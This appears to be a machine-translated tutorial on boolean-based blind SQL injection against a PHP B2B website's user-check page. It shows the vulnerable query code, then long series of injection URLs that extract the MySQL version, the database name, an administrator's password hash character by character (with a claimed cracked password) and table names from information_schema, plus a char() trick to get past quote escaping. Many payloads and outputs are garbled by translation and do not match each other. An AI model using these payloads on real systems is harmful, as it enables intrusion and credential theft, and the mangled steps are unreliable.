The most comprehensive example of MySQL blind Injection

This injection point can use error echo injection to blow up data. This article uses more troublesome blind injection for the purpose of explanation.
Reading this article requires a little SQL basics. Blind note is actually very simple to understand, that is, it is very difficult to do
Let's first look at the injection point, which is a B2B website construction company:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin
The user name has been registered
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin'
Select userid from demo_ B2B _member where user = 'admin' 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin''' at line 1

The error message is clear. Let's take a look at the code of the injection page (with deletions ):

$ Js_user = trim ($ _ GET ["js_user"]);
If ($ js_user ){
$ Num = $ db-> num_rows ("select userid from demo_ B2B _member where user = '$ js_user '");
If (! $ Num)
Echo "<div class = tips3> </div> ";
Else
Echo "<div class = tips2> the user name has been registered </div> ";
}

Although the js_user variable with the GET value is not filtered and directly imported into the database for execution, MySQL also executes the variable, but does not display any information about the database, but determines whether the variable meets
So let's look at the blind note of union first.
First view version:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (version (), 1) = 5% 23

At this time, let's take a look at how the SQL statements in the original code are executed:

Select userid from demo_ B2B _member where user = 'admin' and left (version (), 1) = 5 #'

If (! $ Num) if this condition is returned, "the user name has been registered" is displayed, and version 5 is enabled.
Let's look at the data of database:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + length (database () = 6% 23
Database () length 6
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 1) = 'l' % 23
L
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 2) = 'lil' % 23
Li
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 3) = 'lic '% 23
Lic
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 4) = 'lil' % 23
Licl
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 5) = 'licln '% 23
Licln
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (database (), 6) = 'liclny '% 23
Licclny

The length () function is used to calculate the length of the data in parentheses. It is displayed as a pure number and can be determined by the number greater than or equal to the number.
Here you should take a look at the number changes in the left () function. For left () function, you can refer to the MySQL manual.
Let's look at a simple sentence:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + length (pass) = 32% 23
Select userid from demo_ B2B _member where user = 'admin' and length (pass) = 32 #'

At this time, the pass in the length () function is a guess, of course, based on the correctness of the guess.
Here, pass and the userid After select belong to the same table segment demo_ B2B _admin, so the select statement is not required.
Here we can get:

There is no '# terminator at the end of this Article. Let's take a look. You know. Open before and closed.
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 1) = '0
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 2) = '04
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 3) = '048
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 4) = '100
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 5) = '100
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 6) = '04843e
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 7) = '04843e9
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 8) = '04843e9f
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 9) = '04843e9f9
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 10) = '04843e9f91
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 11) = '04843e9f91a
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 12) = '04843e9f91ad
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 13) = '04843e9f91adf
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 14) = '04843e9f91adf2
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 15) = '04843e9f91adf22
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 16) = '04843e9f91adf228
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 17) = '04843e9f91adf2287
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 18) = '04843e9f91adf2287c
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 19) = '04843e9f91adf2287c0
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 20) = '04843e9f91adf2287c0a
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 21) = '04843e9f91adf2287c0af
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 22) = '04843e9f91adf2287c0af5
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 23) = '04843e9f91adf2287c0af5f
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 24) = '04843e9f91adf2287c0af5fe
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 25) = '04843e9f91adf2287c0af5fe1
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 26) = '04843e9f91adf2287c0af5fe16
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 27) = '04843e9f91adf2287c0af5fe167
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 28) = '04843e9f91adf2287c0af5fe1675
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 29) = '04843e9f91adf2287c0af5fe16750
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 30) = '04843e9f91adf2287c0af5fe16750a
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 31) = '04843e9f91adf2287c0af5fe16750a3
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + left (pass, 32) = '04843e9f91adf2287c0af5fe16750a35
The length is 32, md5 encryption, and the decryption result is lcl2wly.

In this way, you must understand the data guessing method.

Finally, let's look at data other than demo_ B2B _admin. Now we can guess the table segment:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + length (select + table_name + from + information_schema.tables + limit + 100%) <23
Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + length (select + table_name + from + information_schema.tables + limit + 14%) = 23

The actual running SQL statement is:

Select userid from demo_ B2B _member where user = 'admin' and length (select table_name from information_schema.tables limit 0, 1) = 14 #'

The above statement does not understand information_schema. You can refer to other MySQL injection articles to see the significance of this library.
For more information about limit x and y, see the MySQL manual.

The last thing we need to talk about is the ascii and hex functions.
The meaning of these two functions is to avoid the GPC escape of php, for example:

Http://www.bkjia.com/demo/B2B/member/check. php? Js_user = admin' and + substr (left (pass, 1), 1, 1) = char (48) % 23
Select userid from demo_ B2B _member where user = 'admin' and substr (pass, 1, 1) = char (48 )#

For the usage of substr (), refer to the MySQL manual. If you do not understand it, set it as follows. Replace the number in Char () with an ascii number.